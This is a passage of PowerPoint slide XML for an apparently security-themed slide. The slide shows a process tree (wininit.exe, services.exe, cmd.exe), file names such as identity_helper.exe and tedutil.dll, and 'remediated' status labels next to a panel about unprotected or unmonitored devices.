                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="919927" y="899143"/>
                    <a:pt x="939031" y="941811"/>
                    <a:pt x="969917" y="972698"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="978998" y="978821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977587" y="979106"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="916329" y="1005016"/>
                    <a:pt x="873346" y="1065672"/>
                    <a:pt x="873346" y="1136368"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="880413" y="1171373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="811434" y="1223714"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="780645" y="1243791"/>
                    <a:pt x="748183" y="1261812"/>
                    <a:pt x="714200" y="1277544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="580284" y="1339172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446368" y="1277544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174559" y="1151677"/>
                    <a:pt x="0" y="879345"/>
                    <a:pt x="0" y="579401"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="133916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="82131" y="124553"/>
                    <a:pt x="171841" y="110272"/>
                    <a:pt x="267832" y="89295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="384325" y="63819"/>
                    <a:pt x="488793" y="32590"/>
                    <a:pt x="580284" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="13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SK"/>
            </a:p>
          </p:txBody>
        </p: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1423EFC-EBEB-B25A-BD60-644D615857B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9180513" y="4546123"/>
            <a:ext cx="0" cy="1929014"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="33000">
                  <a:schemeClr val="accent4"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent3"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="10800000" scaled="1"/>
              <a:tileRect/>
            </a:gra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9EDFDFC-6E4F-6342-FC18-11607DA9A1DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4792485" y="6475137"/>
            <a:ext cx="8717404" cy="2853744"/>
            <a:chOff x="7177998" y="405422"/>
            <a:chExt cx="8717404" cy="2853744"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle: Rounded Corners 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47EAC0CF-3C84-B912-9C5B-6CB168EABFBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7177998" y="405422"/>
              <a:ext cx="8717404" cy="2853744"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4822"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect l="-174431" t="-31679" r="-146991" b="-247925"/>
              </a:stretch>
            </a:blipFill>
            <a:ln>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent4"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="189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CAECDCC-FBBB-B841-D4DB-72E4BF55776D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9070953" y="774301"/>
              <a:ext cx="49171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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2000" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Fedra Sans Alt Pro Book LF"/>
                </a:rPr>
                <a:t>Unprotected/Unmonitored Devices</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4AEBD7-DD49-D13D-BE5F-1AC5CC4085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809185" y="7509132"/>
            <a:ext cx="1586749" cy="1267673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7063D885-308F-1B78-3317-246E33EA76C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10857186" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
            <a:chOff x="10857186" y="7854532"/>
            <a:chExt cx="1068114" cy="706529"/>
          </a:xfrm>
        </p:grpSpPr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F273D167-C957-8AC8-681C-A1251A6A8432}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10857186" y="7854532"/>
              <a:ext cx="1068114" cy="706529"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13671"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274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5A0095C5-07FD-7288-C950-22F8F0C44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10976825" y="8110712"/>
              <a:ext cx="832143" cy="194167"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E33CEA9-935D-E76F-0004-6843C5ECCC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350625" y="7509132"/>
            <a:ext cx="1586749" cy="1267673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0028DDEB-B4B4-43C6-8ABF-B7C271A25EB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8398626" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
            <a:chOff x="10857186" y="7854532"/>
            <a:chExt cx="1068114" cy="706529"/>
          </a:xfrm>
        </p:grpSpPr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FCEB27BD-E272-67F7-412A-694315A89198}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10857186" y="7854532"/>
              <a:ext cx="1068114" cy="706529"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13671"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274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8585ECB2-57DC-8828-35F8-CB218C54B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10976825" y="8110712"/>
              <a:ext cx="832143" cy="194167"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Graphic 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F5B4FE-9D62-EA14-E641-FC8EDC059C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901282" y="7509132"/>
            <a:ext cx="1586749" cy="126767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F450FF96-87BB-F8AE-A054-CC41C9A43F06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5949283" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
            <a:chOff x="10857186" y="7854532"/>
            <a:chExt cx="1068114" cy="706529"/>
          </a:xfrm>
        </p:grpSpPr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79E1D494-F4FF-0C06-BA37-3568DE3DA811}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10857186" y="7854532"/>
              <a:ext cx="1068114" cy="706529"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 13671"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4274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B476D28D-A228-D62D-3A34-DCA08628C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10976825" y="8110712"/>
              <a:ext cx="832143" cy="194167"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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7E666B94-BFB6-93B0-ADF3-35D74F8325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068922" y="2926668"/>
            <a:ext cx="1586749" cy="126767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B59D37E3-F058-A25B-E94A-BDEFE9E93936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8407387" y="3047821"/>
            <a:ext cx="3908524" cy="512684"/>
            <a:chOff x="8675040" y="3047821"/>
            <a:chExt cx="3908524" cy="512684"/>
          </a:xfrm>
        </p:grpSpPr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4626022E-E9DE-F591-4BF2-BF0778084D5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9201048" y="3059400"/>
              <a:ext cx="338251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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" kern="0" err="1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identity_helper.exe</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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6DA06884-FF6E-DEFA-089A-7461ED34F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8675040" y="3047821"/>
              <a:ext cx="512684" cy="51268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87D0BDF-C2F7-8148-71DF-DF92413F331F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8390509" y="3643024"/>
            <a:ext cx="3776042" cy="554859"/>
            <a:chOff x="8658162" y="3643024"/>
            <a:chExt cx="3776042" cy="55485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091EFFC-7826-9000-0058-BE5B1EB5F2E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9201048" y="3685199"/>
              <a:ext cx="323315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811382">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" kern="0" err="1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tedutil.dll</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/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2C6FD994-8D53-7E26-A939-6AD6F0773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p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8658162" y="3643024"/>
              <a:ext cx="554859" cy="554859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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54AF73DE-8EA5-AC83-3BA7-152E6A61017A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947767" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="33000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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K" sz="1100">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remediated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C98BF7DB-501C-0A2E-E3D5-44C2D19B1956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8394753" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="33000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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K" sz="1100">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remediated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60E38646-FF6B-9B0C-4088-0B00CE7D1FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858910" y="7854532"/>
            <a:ext cx="1068114" cy="706529"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13671"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="33000">
                <a:schemeClr val="accent4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3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K" sz="1100">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>remediated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="Picture 10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3F1503B-7F3D-DDCB-0C7D-4DA1883DDFB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-100000"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="-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477"/>
            <a:ext cx="18317388" cy="10270523"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="104" name="Group 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692FA10A-C44B-D9A2-4D08-BA52B4238730}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4148868" y="2625027"/>
            <a:ext cx="9653174" cy="5289438"/>
            <a:chOff x="-13855523" y="-7204731"/>
            <a:chExt cx="9653174" cy="5289438"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Rounded Rectangle 99">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{724E67C2-2755-3F3F-6C37-47841914034A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-13855523" y="-7204731"/>
              <a:ext cx="9653174" cy="5289438"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 5279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715A4B93-FF86-8471-6F09-975B940B15F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-13634711" y="-7204731"/>
              <a:ext cx="6931693" cy="4461617"/>
              <a:chOff x="-13634711" y="-7204731"/>
              <a:chExt cx="6931693" cy="4461617"/>
            </a:xfrm>
          </p:grpSpPr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B5A6E3FC-1A2A-3C25-A0E9-733943CBCDF7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-11043635" y="-4418854"/>
                <a:ext cx="3145521" cy="834390"/>
                <a:chOff x="12600384" y="914400"/>
                <a:chExt cx="3145521" cy="834390"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="54" name="Rounded Rectangle 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{231FB947-9176-BB73-ABC2-CF3A417FB053}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12600384" y="1103018"/>
                  <a:ext cx="2789040" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="424D56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SK"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="55" name="Graphic 54">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B216A8CE-E298-E5F2-57B5-6A38E915CF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96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                      <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" xmlns="" r:embed="rId19"/>
                    </a:ext>
                  </a:extLst>
                </a:blip>
                <a:srcRect/>
                <a:stretch/>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12766356" y="1162059"/>
                  <a:ext cx="549560" cy="335445"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="56" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5108AAC6-86CA-B428-D5ED-D83855D83920}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="13341701" y="914400"/>
                  <a:ext cx="2404204" cy="834390"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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defTabSz="1811382">
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>cmd.exe</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> (7404)</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p: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A5896DD4-A3A1-10A8-1B49-1E6C6492C5D9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-13071867" y="-6863965"/>
                <a:ext cx="2478756" cy="468180"/>
                <a:chOff x="12235546" y="1103018"/>
                <a:chExt cx="2478756" cy="468180"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="58" name="Rounded Rectangle 57">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86718BEF-FAD5-90BC-94B8-D4CD0F345AA0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12235546" y="1103018"/>
                  <a:ext cx="2478756" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="424D56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SK"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="59" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5DF06E-6845-AEF0-427B-18A633ABD3AE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12324832" y="1138270"/>
                  <a:ext cx="2389469" cy="413599"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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defTabSz="1811382">
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>wininit.exe</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> (600)</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="67" name="Elbow Connector 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FA06753-098E-67BB-C4DB-EDD39F621AFC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="-13640717" y="-7198725"/>
                <a:ext cx="574856" cy="562844"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="31750">
                <a:solidFill>
                  <a:srgbClr val="424D56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Elbow Connector 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13FA4262-35E7-3357-0F78-FDE322272E3D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:endCxn id="54" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="-11523963" y="-4476474"/>
                <a:ext cx="617552" cy="343104"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="31750">
                <a:solidFill>
                  <a:srgbClr val="424D56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F258CAB1-27DE-5104-4F30-6536BA0CB14C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="-12393460" y="-6013018"/>
                <a:ext cx="2740173" cy="468180"/>
                <a:chOff x="12235544" y="1103018"/>
                <a:chExt cx="2740173" cy="468180"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="71" name="Rounded Rectangle 70">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{707FD257-E00C-2A86-17C9-C5EFA47D25EA}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12235544" y="1103018"/>
                  <a:ext cx="2740173" cy="468180"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="000D13"/>
                </a:solidFill>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="424D56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SK"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="72" name="Rectangle: Rounded Corners 28">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CD2D754-ADF9-5BF3-361A-E26C2AB55D47}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="12379151" y="1139122"/>
                  <a:ext cx="2596566" cy="431225"/>
                </a:xfrm>
                <a:prstGeom prst="roundRect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="1079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defTabSz="1811382">
                    <a:defRPr/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0" err="1">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t>services.exe</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1800" kern="0">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    </a:rPr>
                    <a:t> (676)</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="73" name="Elbow Connector 72">
